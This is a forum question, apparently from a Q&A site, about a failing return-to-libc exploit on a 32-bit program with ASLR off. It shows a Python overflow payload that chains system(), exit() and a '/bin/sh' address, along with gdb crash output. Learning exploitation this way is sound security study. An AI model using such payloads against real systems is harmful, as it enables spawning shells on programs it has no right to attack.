# Return-to-libc attack

Tags: segmentation-fault, buffer-overflow, libc

I am working on a ret2libc attack and I have come across a problem I can't solve by myself.

ASLR is disabled. The NX-bit is set.

I am able to overwrite the return address with the following command:

```
python -c 'print "A"*112 + "BBBB"'`
```

If I call the function with the above command, gdb prints the following:

```
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x804a000    134520832
ecx            0xffffcebc   -12612
edx            0x0  0
ebx            0xf7fb1000   -134541312
esp            0xffffcf30   0xffffcf30
ebp            0x41414141   0x41414141
esi            0x0  0
edi            0x8048520    134513952
eip            0x42424242   0x42424242
eflags         0x10282  [ SF IF RF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0  0
gs             0x63 99
```

So far, so good.

Then I printed the address of `system()` and `exit()`:

```
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e37cd0 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e2ba20 <exit>
```

and put "/bin/sh" into an environment variable

```
0xffffd2bd: "SHELL=/bin/bash"
```

So the address of /bin/sh is equal to 0xffffd2bd + 0x6 = 0xffffd2c3

But if I call the function with the following command:

```
python -c 'print "A"*112 + "\xd0\x7c\xe3\xf7" + "\x20\xba\xe2\xf7" + "\xc3\xd2\xff\xff"
```

it leads to

```
Program received signal SIGSEGV, Segmentation fault.
0x080487c9 in get_desc ()
(gdb) i r
eax            0xf7e2ba20   -136136160
ecx            0xffffcebc   -12612
edx            0x0  0
ebx            0xf7fb1000   -134541312
esp            0xffffceb0   0xffffceb0
ebp            0xffffcf28   0xffffcf28
esi            0x0  0
edi            0x8048520    134513952
eip            0x80487c9    0x80487c9 <my_func+169>
eflags         0x10282  [ SF IF RF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0  0
gs             0x63 99
```

The address of exit is now in the eax-register.

I am thankful for every hint.

regars